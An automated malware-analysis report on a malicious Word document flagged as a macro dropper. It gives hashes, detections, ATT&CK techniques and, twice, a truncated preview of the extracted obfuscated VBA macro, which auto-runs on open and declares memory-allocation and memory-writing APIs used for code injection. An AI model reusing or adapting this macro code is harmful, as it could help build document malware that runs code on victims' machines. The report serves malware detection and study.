Office (OLE) malware analysis — malicious · d6e48036f714c0a3

MALICIOUS

Office (OLE)

177.5 KB Created: 2017-11-06 14:16:00 Authoring application: Microsoft Office Word First seen: 2017-11-13

MD5: eb9b56085342dadd61d39fe44198fbcd SHA-1: a81598dee5164d16b934d449bd6b16bb634a83f1 SHA-256: d6e48036f714c0a357213ae7d75230b876b31a481223cd1cd845a46d03b48d1c

122 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6366780-0', indicating it's a document dropper. The presence of a 'Document_Open' VBA macro strongly suggests that the macro is designed to execute automatically when the document is opened. While the VBA code is heavily obfuscated and truncated, the declared API calls like 'CreateTimerQueueTimer', 'GetOverlappedResult', 'SleepConditionVariableSRW', 'NtWriteVirtualMemory', and 'NtAllocateVirtualMemory' point towards malicious activity, likely involving the download and execution of a secondary payload.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6366780-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6366780-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32447 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32447 bytes
SHA-256: `8ab86482a4baad14c568468e228257fc0a7a05d33751d6275721c80e1e30f503`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim blowing As Long Dim bloodless As Integer pedunculate = "cantilenam" muhlenbergia = "antifreeze" foxiss.incredulity calceus = 50 + 9 frangible = 18180 + 1 whydah = 124440 + 4 Pmt 0, calceus, 32028, 28545, 7 End Sub Attribute VB_Name = "aforte" #If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then Public Declare Function towhee Lib "Kernel32" Alias "CreateTimerQueueTimer" (returning As Any, ByVal caliche As Any, ByVal mitt As Any, ByVal amentiferae As Any, ByVal anthologist As Any, ByVal untruly As Any, ByVal sclerite As Any) As Long Public Declare Function cashable Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal theolgian As Any, epicene As Any, predicative As Any, seaweed As Any) As Long Public Declare Function lythraceae Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal scandent As Any, chequer As Any, flight As Any, be As Any) As Long Public Declare Function artichoke _ Lib "Ntdll " Alias "NtWriteVirtualMemory" (ByVal dreamy As Any, ByVal skeleton As Any, ByVal invidious As Any, ByVal blacktop As Any, ByVal inconceivably As Any) As Long Public Declare Function potty _ Lib "Ntdll " Alias "NtAllocateVirtualMemory" (plantar As Long, epulation As Long, ByVal appropriable As Long, musguByVal As Long, liberian As Long, ByVal gymslip As Long) As Long #End If #If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then Public Declare PtrSafe Function artichoke _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal larmes As Any, ByVal digladiation As Any, ByVal ambassadress As Any, ByVal cochelous As Any, ByVal bocage As Any) As LongPtr Public Declare PtrSafe Function beginner Lib "Shlwapi.dll " Alias "SleepConditionVariableSRW" (ByVal bronchitic As Any, admissable As Any, peppermint As Any, creeper As Any) As LongPtr Public Declare PtrSafe Function potty _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (asymmetry As LongPtr, foamy As LongPtr, ByVal amianthus As LongPtr, barbouillageByVal As LongPtr, backswimmer As LongPtr, ByVal drogue As LongPtr) As LongPtr Public Declare PtrSafe Function towhee Lib "Kernel32" Alias "CreateTimerQueueTimer" (turpentine As Any, ByVal immunosuppressant As Any, ByVal mugginess As Any, ByVal fateful As Any, ByVal apochromatic As Any, ByVal lizard As Any, ByVal welldefined As Any) As Long Public Declare PtrSafe Function associate Lib "Shlwapi.dll " Alias "GetOverlappedResult" (ByVal dropping As Any, declivitous As Any, microstrobos As Any, medulla As Any) As LongPtr #End If Function orchard(kiev, erotically, alca) If alca = (41 + (10 / 2 - 5)) * 1 Then orchard = kiev \ erotically ElseIf alca = (51 + (5 - 3) / 2 - 1) * 1 Then orchard = kiev And erotically ElseIf alca = (59 + (56 / 7 - 4 * 2)) * 1 Then orchard = kiev * erotically End If End Function Function parlor() Dim ghastly(255) As Byte dracunculus = 114 - 38 - 11 Do While 1 * (dracunculus) <= (90 + 1) * 1 ghastly(dracunculus) = dracunculus - 65 dracunculus = dracunculus + 1 Loop dracunculus = 40 + 8 Do While 1 * (dracunculus) <= (50 + 8) * 1 ghastly(dracunculus) = dracunculus + 4 dracunculus = dracunculus + 1 Loop dracunculus = 90 + 7 Do While 1 * (dracunculus) <= (120 + 3) * 1 ghastly(dracunculus) = dracunculus - 71 dracunculus = dracunculus + 1 Loop ghastly(47) = 60 + 3 dracunculus = 40 + 3 ghastly(dracunculus) = 60 + 2 parlor = ghastly End Function Function banished(bloodmobile) As String Dim assiduity() As Byte Dim haplosporidian(63) As Long Dim grto(63) As Long Dim flindersia(63) As Long Dim cornhusk As Long Dim alms As Long Dim student As Long Dim decoration() As Byte Dim clitoral As Long cither = cither And 297 assiduity = VBA.StrConv(bloodmobile, 128) Dim exacum(6962) As By ... (truncated)

SHA-256: 8ab86482a4baad14c568468e228257fc0a7a05d33751d6275721c80e1e30f503

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True



Private Sub Document_Open()
Dim blowing As Long
Dim bloodless As Integer
pedunculate = "cantilenam"
muhlenbergia = "antifreeze"
foxiss.incredulity
calceus = 50 + 9
frangible = 18180 + 1
whydah = 124440 + 4
 Pmt 0, calceus, 32028, 28545, 7
End Sub

Attribute VB_Name = "aforte"
#If (13 * 3 + 5) > (8 - 3 * 1) And Not (88 - 11 * 8) * 30 < (Win64) Then
Public Declare Function towhee Lib "Kernel32" Alias "CreateTimerQueueTimer" (returning As Any, ByVal caliche As Any, ByVal mitt As Any, ByVal amentiferae As Any, ByVal anthologist As Any, ByVal untruly As Any, ByVal sclerite As Any) As Long
Public Declare Function cashable Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal theolgian As Any, epicene As Any, predicative As Any, seaweed As Any) As Long
Public Declare Function lythraceae Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal scandent As Any, chequer As Any, flight As Any, be As Any) As Long
Public Declare Function artichoke _
  Lib "Ntdll   " Alias "NtWriteVirtualMemory" (ByVal dreamy As Any, ByVal skeleton As Any, ByVal invidious As Any, ByVal blacktop As Any, ByVal inconceivably As Any) As Long
Public Declare Function potty _
  Lib "Ntdll  " Alias "NtAllocateVirtualMemory" (plantar As Long, epulation As Long, ByVal appropriable As Long, musguByVal As Long, liberian As Long, ByVal gymslip As Long) As Long
#End If

#If (13 * 3 + 5) > (8 - 3 * 1) And (88 - 11 * 8) * 30 < (Win64) Then
Public Declare PtrSafe Function artichoke _
 Lib "ntdll   " Alias _
 "NtWriteVirtualMemory" (ByVal larmes As Any, ByVal digladiation As Any, ByVal ambassadress As Any, ByVal cochelous As Any, ByVal bocage As Any) As LongPtr
Public Declare PtrSafe Function beginner Lib "Shlwapi.dll  " Alias "SleepConditionVariableSRW" (ByVal bronchitic As Any, admissable As Any, peppermint As Any, creeper As Any) As LongPtr
Public Declare PtrSafe Function potty _
  Lib "ntdll  " Alias _
  "NtAllocateVirtualMemory" (asymmetry As LongPtr, foamy As LongPtr, ByVal amianthus As LongPtr, barbouillageByVal As LongPtr, backswimmer As LongPtr, ByVal drogue As LongPtr) As LongPtr
Public Declare PtrSafe Function towhee Lib "Kernel32" Alias "CreateTimerQueueTimer" (turpentine As Any, ByVal immunosuppressant As Any, ByVal mugginess As Any, ByVal fateful As Any, ByVal apochromatic As Any, ByVal lizard As Any, ByVal welldefined As Any) As Long
Public Declare PtrSafe Function associate Lib "Shlwapi.dll  " Alias "GetOverlappedResult" (ByVal dropping As Any, declivitous As Any, microstrobos As Any, medulla As Any) As LongPtr
#End If


Function orchard(kiev, erotically, alca)
If alca = (41 + (10 / 2 - 5)) * 1 Then
orchard = kiev \ erotically
ElseIf alca = (51 + (5 - 3) / 2 - 1) * 1 Then
orchard = kiev And erotically
ElseIf alca = (59 + (56 / 7 - 4 * 2)) * 1 Then
orchard = kiev * erotically
End If
End Function

Function parlor()
Dim ghastly(255) As Byte
dracunculus = 114 - 38 - 11
Do While 1 * (dracunculus) <= (90 + 1) * 1
ghastly(dracunculus) = dracunculus - 65
dracunculus = dracunculus + 1
Loop
dracunculus = 40 + 8
Do While 1 * (dracunculus) <= (50 + 8) * 1
ghastly(dracunculus) = dracunculus + 4
dracunculus = dracunculus + 1
Loop
dracunculus = 90 + 7
Do While 1 * (dracunculus) <= (120 + 3) * 1
ghastly(dracunculus) = dracunculus - 71
dracunculus = dracunculus + 1
Loop
ghastly(47) = 60 + 3
dracunculus = 40 + 3
ghastly(dracunculus) = 60 + 2
parlor = ghastly
End Function

Function banished(bloodmobile) As String
Dim assiduity() As Byte
Dim haplosporidian(63) As Long
Dim grto(63) As Long
Dim flindersia(63) As Long
Dim cornhusk As Long
Dim alms As Long
Dim student As Long
Dim decoration() As Byte
Dim clitoral As Long
cither = cither And 297
assiduity = VBA.StrConv(bloodmobile, 128)
Dim exacum(6962) As By
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.